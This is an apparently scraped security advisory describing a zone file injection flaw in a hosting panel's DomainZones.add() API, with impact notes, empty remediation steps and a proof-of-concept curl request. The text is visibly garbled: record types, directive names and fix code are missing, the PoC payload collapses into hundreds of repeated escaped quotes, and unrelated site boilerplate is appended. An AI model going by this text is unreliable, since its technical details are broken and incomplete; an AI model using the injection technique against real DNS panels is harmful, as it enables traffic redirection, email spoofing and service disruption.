CVE-2024-41230: Froxlro Zone File Injection via Unsanitized DNS Records

Vulnerability Overview Vulnerability Name: BIND Zone File Injection via Unsanitized DNS Record Content in DomainZones::add() Vulnerability Description: Vulnerability Type: Injection Vulnerability Severity: High CVSS Score: 8.5 / 10 CVE ID: CVE-2024-41230 Vulnerability Details: Root Cause: The function accepts arbitrary DNS record types without whitelist validation and does not handle newline characters in content. When submitting DNS record types (such as , , ) not covered by the validation chain, content validation is completely bypassed. Embedded newline characters remain after processing, are stored in the database, and written directly into the BIND zone file. Exploitation: Authenticated users can inject arbitrary DNS records and BIND directives (e.g., , , ) into their domain zone files. Impact Scope Affected Versions: versions <= 2.2.x Fixed Version: 2.3.6 Impact: - Inject arbitrary DNS records, bypassing content validation, including A/AAAA records pointing to attacker-controlled IPs, redirecting legitimate traffic. - Manipulate email verification by injecting TXT records, overriding SPF, DKIM, or DMARC policies, enabling phishing attacks. - Inject BIND server directives (e.g., , , ), potentially including local server files, leading to data leakage or mass record generation. - Cause DNS service disruption by injecting malformed records or conflicting directives, affecting DNS resolution for all domains. Remediation Plan 1. Add Type Whitelist: 2. Remove Newlines from Content: 3. Sanitize Content in : POC Code Step 1: Inject DNS record with embedded newlines via API ```bash curl -s -X POST 'https://froxlro.example.com/api.php' \ -u 'APIKEY:APISECRET' \ -H 'Content-Type: application/json' \ -d '{ "command": "DomainZones.add", "params": { "id": 1, "type": "NAPTR", "content": "100 10 \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\" \\"

Goal Reached Thanks to every supporter — we hit 100%!

CVE-2024-41230: Froxlro Zone File Injection via Unsanitized DNS Records

More from this source